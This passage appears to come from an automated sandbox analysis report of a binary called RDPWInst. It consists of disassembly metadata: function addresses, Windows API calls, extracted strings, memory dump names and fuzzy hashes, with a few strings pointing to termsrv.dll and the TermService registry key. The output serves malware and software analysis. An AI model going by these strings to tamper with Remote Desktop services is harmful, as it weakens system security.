                                                    • RaiseException.KERNEL32(C0FB007F,00000000,00000001,?), ref: 0040A067
                                                      • Part of subcall function 00409D9C: LocalAlloc.KERNEL32(00000040,00000008), ref: 00409DA8
                                                      • Part of subcall function 00409D9C: RaiseException.KERNEL32(C0FB0008,00000000,00000001,?,00000040,00000008), ref: 00409DBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionRaise$CriticalErrorLastLibrarySection$AddressAllocEnterFreeLeaveLoadLocalProc
                                                    • String ID: $
                                                    • API String ID: 4255670546-3993045852
                                                    • Opcode ID: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                    • Instruction ID: e7bef61209e92d946731ec4a4071e7a79c0b4aa0f4738c46576ebf8cfa3b661b
                                                    • Opcode Fuzzy Hash: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                    • Instruction Fuzzy Hash: EE618D7590070AAFDB21DFA5D885BAFB3B4AF48314F14803AE504B62D2D7789D44CB59
                                                    Function 00403B64 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 277windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MessageBoxA.USER32(00000000,?,004026E0,00002010), ref: 00403F39
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: $$zD$$zD$7$D&@$l&@$zPD$&@
                                                    • API String ID: 2030045667-2939321579
                                                    • Opcode ID: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                    • Instruction ID: 997706f527e00cc568bc624ae0a330c29571725258f71f9dd8560831bc4d878f
                                                    • Opcode Fuzzy Hash: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                    • Instruction Fuzzy Hash: E5B1B434A042548FDB20DF2DC884B997BE8AB09745F1441FAE449F7382CB799E85CB59
                                                    Function 00415198 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 203threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000000,00415476,?,?,00000000,00000000), ref: 004151CE
                                                      • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                    • API String ID: 4232894706-2493093252
                                                    • Opcode ID: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                    • Instruction ID: d9a4c13083f090c9220c38b115c8470d0dd0b24888f81dbd48f38483d2476b95
                                                    • Opcode Fuzzy Hash: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                    • Instruction Fuzzy Hash: C6717E34B005489BDB04EBA5C881BDF73A6DB88308F50843BB201EB39ADA3DDD95975C
                                                    Function 0041983C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004198D5
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004198F1
                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041992A
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004199A7
                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004199C0
                                                    • VariantCopy.OLEAUT32(?), ref: 004199F5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                    • String ID:
                                                    • API String ID: 351091851-3916222277
                                                    • Opcode ID: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                    • Instruction ID: 05f3e7187411a66581312748be8f4c599b64c7f757b61d9c7bcf5be2e84cfcbc
                                                    • Opcode Fuzzy Hash: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                    • Instruction Fuzzy Hash: BB510E75A1061D9BCB62DB59CC91AD9B3BCAF0C314F0041DAE509D7311DA389FC18F69
                                                    Function 00406190 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                    • GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                    • WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00406208
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$Message
                                                    • String ID: Error$Runtime error at 00000000
                                                    • API String ID: 1570097196-2970929446
                                                    • Opcode ID: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                    • Instruction ID: 3d9f27a079d1a1e85d20769b70378e11af8d5357eb747b9bac5a8d01f7cd0a80
                                                    • Opcode Fuzzy Hash: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                    • Instruction Fuzzy Hash: F8F09064688700B9FA1077A09D8BF5A264C5741F18F648A7FBA107C0E3C7FC44C5D66E
                                                    Function 00403220 Relevance: 10.9, APIs: 7, Instructions: 407COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                    • Instruction ID: cdb4153b94d32a19bbaa749183bbd41ea1cad44ce1b02117721c392bcbf59f8f
                                                    • Opcode Fuzzy Hash: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                    • Instruction Fuzzy Hash: AAC149627046001BE715AE7D9EC936E77899BC5326F18827FE504EB3C5DABCCE468348
                                                    Function 00408D70 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71stringlibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 00408D8D
                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 00408DA4
                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00408DD4
                                                    • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 00408E43
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$AddressHandleModuleProc
                                                    • String ID: GetLongPathNameW$kernel32.dll
                                                    • API String ID: 682285877-568771998
                                                    • Opcode ID: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                    • Instruction ID: bfed53c75bae09f5f3cffe8e2e1a10a808aab42f40121fe7fe66bb66f29727bd
                                                    • Opcode Fuzzy Hash: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                    • Instruction Fuzzy Hash: 65213E71D10219EBDB10DBE8CA85A9EB3F9AF04344F14457BA584F72C1EB789E408B99
                                                    Function 0043C9B4 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00447324,?,?,00443D51,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043CA09
                                                    Strings
                                                    • %SystemRoot%\System32\termsrv.dll, xrefs: 0043CA53
                                                    • $sD, xrefs: 0043CA16
                                                    • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C9F8
                                                    • [-] OpenKey error (code , xrefs: 0043CA1B
                                                    • ServiceDll, xrefs: 0043CA58
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: $sD$%SystemRoot%\System32\termsrv.dll$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters
                                                    • API String ID: 1452528299-1418523706
                                                    • Opcode ID: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                    • Instruction ID: 567d776bcdb317a1c07dce30fb64d79162ce412928a02d635409720c7dced6b6
                                                    • Opcode Fuzzy Hash: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                    • Instruction Fuzzy Hash: 5E1160746042049FD700FBAAED8355AB7A5DB89318F21A07FF504AB652CA396D01972D
                                                    Function 0043B48C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52serviceCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleService
                                                    • String ID: error (code $$sD$[-]
                                                    • API String ID: 1725840886-1845222458
                                                    • Opcode ID: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                    • Instruction ID: e4f6fbb8d87d745fddbbf3aa76ef7c2d42e102f771b0e90c1d198fe2bf5ce7b8
                                                    • Opcode Fuzzy Hash: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                    • Instruction Fuzzy Hash: 411165B4604204AFD700FBA5C946A5EBBE9EF8C309F51807AF504DB652C738AE409A6D
                                                    Function 0041EFE0 Relevance: 7.8, APIs: 5, Instructions: 334COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                    • Instruction ID: 2dafaf7b7fd63d2285bbc883fb865dc5d4a09b7d21a303d5748d7aa51e2b097e
                                                    • Opcode Fuzzy Hash: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                    • Instruction Fuzzy Hash: 33D18035E042599BCF10DBA9C4818FEB7B9EF49704B5080B7EC51A7251D738AD8BCB29
                                                    Function 0042E0CC Relevance: 7.6, APIs: 5, Instructions: 142COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E12C
                                                    • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1D4
                                                    • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1F9
                                                    • CharNextW.USER32(00000000,?,?,00000000,0042E26E), ref: 0042E211
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharNext
                                                    • String ID:
                                                    • API String ID: 3213498283-0
                                                    • Opcode ID: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                    • Instruction ID: 1814d07402b1a7f57a8d7a3fe8506fdc05c33e5c0032e5bf9772b1ea290cc636
                                                    • Opcode Fuzzy Hash: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                    • Instruction Fuzzy Hash: D5516D30B00624DFDF15EF6AD890A697BB5EF06304F8100E6E401DB3A5D778AD92CB5A
                                                    Function 00412EDC Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,00412F73,?,?,00000000), ref: 00412EF4
                                                      • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F24
                                                    • EnumCalendarInfoW.KERNEL32(Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F2F
                                                    • GetThreadLocale.KERNEL32(00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F4D
                                                    • EnumCalendarInfoW.KERNEL32(Function_00012E64,00000000,00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F58
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                    • String ID:
                                                    • API String ID: 4102113445-0
                                                    • Opcode ID: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                    • Instruction ID: 92d88662b64aaf91616c62fb6041fad244e46e3b41fee23c13374d6d2d88cd2b
                                                    • Opcode Fuzzy Hash: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                    • Instruction Fuzzy Hash: 930142713007046BE301A6B1CE13F9A726CEB82718F610437F100F66C1D6BCAE2192AD
                                                    Function 00412F90 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,004131C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412FCB
                                                      • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: eeee$ggg$yyyy
                                                    • API String ID: 4232894706-1253427255
                                                    • Opcode ID: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                    • Instruction ID: b43ca61d4524358572b11bc7e7a437c5213401559800a2754e6fdc13831cf262
                                                    • Opcode Fuzzy Hash: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                    • Instruction Fuzzy Hash: 97519835B00105ABDB10EF69C8425DEB7B5EF84305B21807BA401E73AADB7CDF92965D
                                                    Function 00412D02 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocaleThread
                                                    • String ID: 0\D$`\D$|\D
                                                    • API String ID: 635194068-1443555069
